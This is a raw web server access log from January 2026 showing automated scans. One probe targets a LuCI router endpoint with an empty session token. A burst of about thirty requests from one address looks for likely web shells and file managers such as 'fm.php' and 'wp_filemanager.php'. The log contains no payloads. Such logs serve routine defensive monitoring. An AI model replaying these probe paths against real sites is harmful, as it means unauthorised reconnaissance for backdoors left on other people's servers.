91.224.92.115 - - [26/Jan/2026:22:07:26 -0500] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 288 "-" "-"
204.76.203.212 - - [26/Jan/2026:22:24:54 -0500] "GET / HTTP/1.1" 403 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
204.76.203.212 - - [26/Jan/2026:22:47:33 -0500] "GET / HTTP/1.1" 403 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
43.166.250.187 - - [26/Jan/2026:22:55:47 -0500] "GET / HTTP/1.1" 403 267 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
162.62.132.25 - - [26/Jan/2026:23:03:38 -0500] "GET / HTTP/1.1" 403 266 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
40.69.66.178 - - [26/Jan/2026:23:06:33 -0500] "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1" 404 311 "-" "-"
40.69.66.178 - - [26/Jan/2026:23:06:34 -0500] "GET /baixy.php HTTP/1.1" 404 272 "-" "-"
40.69.66.178 - - [26/Jan/2026:23:06:34 -0500] "GET /bgymj.php HTTP/1.1" 404 272 "-" "-"
40.69.66.178 - - [26/Jan/2026:23:06:34 -0500] "GET /nf.php HTTP/1.1" 404 269 "-" "-"
40.69.66.178 - - [26/Jan/2026:23:06:34 -0500] "GET /davaa.php HTTP/1.1" 404 272 "-" "-"
40.69.66.178 - - [26/Jan/2026:23:06:34 -0500] "GET /ceiif.php HTTP/1.1" 404 272 "-" "-"
40.69.66.178 - - [26/Jan/2026:23:06:34 -0500] "GET /sst.php HTTP/1.1" 404 270 "-" "-"
40.69.66.178 - - [26/Jan/2026:23:06:34 -0500] "GET /class-db.php HTTP/1.1" 404 275 "-" "-"
40.69.66.178 - - [26/Jan/2026:23:06:34 -0500] "GET /tmpls.php HTTP/1.1" 404 272 "-" "-"
40.69.66.178 - - [26/Jan/2026:23:06:34 -0500] "GET /ver.php HTTP/1.1" 404 270 "-" "-"
40.69.66.178 - - [26/Jan/2026:23:06:34 -0500] "GET /ultra.php HTTP/1.1" 404 272 "-" "-"
40.69.66.178 - - [26/Jan/2026:23:06:34 -0500] "GET /pro.php HTTP/1.1" 404 270 "-" "-"
40.69.66.178 - - [26/Jan/2026:23:06:35 -0500] "GET /wp-good.php HTTP/1.1" 404 274 "-" "-"
40.69.66.178 - - [26/Jan/2026:23:06:35 -0500] "GET /e.php HTTP/1.1" 404 268 "-" "-"
40.69.66.178 - - [26/Jan/2026:23:06:35 -0500] "GET /data.php HTTP/1.1" 404 271 "-" "-"
40.69.66.178 - - [26/Jan/2026:23:06:35 -0500] "GET /abcd.php HTTP/1.1" 404 271 "-" "-"
40.69.66.178 - - [26/Jan/2026:23:06:35 -0500] "GET /z.php HTTP/1.1" 404 268 "-" "-"
40.69.66.178 - - [26/Jan/2026:23:06:35 -0500] "GET /css.php HTTP/1.1" 404 270 "-" "-"
40.69.66.178 - - [26/Jan/2026:23:06:35 -0500] "GET /image.php HTTP/1.1" 404 272 "-" "-"
40.69.66.178 - - [26/Jan/2026:23:06:35 -0500] "GET /file22.php HTTP/1.1" 404 273 "-" "-"
40.69.66.178 - - [26/Jan/2026:23:06:35 -0500] "GET /check.php HTTP/1.1" 404 272 "-" "-"
40.69.66.178 - - [26/Jan/2026:23:06:35 -0500] "GET /wp-header-json.php HTTP/1.1" 404 281 "-" "-"
40.69.66.178 - - [26/Jan/2026:23:06:36 -0500] "GET /fm.php HTTP/1.1" 404 269 "-" "-"
40.69.66.178 - - [26/Jan/2026:23:06:36 -0500] "GET /1.php HTTP/1.1" 404 268 "-" "-"
40.69.66.178 - - [26/Jan/2026:23:06:36 -0500] "GET /ws.php HTTP/1.1" 404 269 "-" "-"
40.69.66.178 - - [26/Jan/2026:23:06:36 -0500] "GET /xxxx.php HTTP/1.1" 404 271 "-" "-"
40.69.66.178 - - [26/Jan/2026:23:06:36 -0500] "GET /wp-configs.php HTTP/1.1" 404 277 "-" "-"
40.69.66.178 - - [26/Jan/2026:23:06:36 -0500] "GET /xmlrpc.php HTTP/1.1" 403 277 "-" "-"
40.69.66.178 - - [26/Jan/2026:23:06:36 -0500] "GET /file56.php HTTP/1.1" 404 273 "-" "-"
40.69.66.178 - - [26/Jan/2026:23:06:36 -0500] "GET /990.php HTTP/1.1" 404 270 "-" "-"
40.69.66.178 - - [26/Jan/2026:23:06:36 -0500] "GET /error.php HTTP/1.1" 404 272 "-" "-"
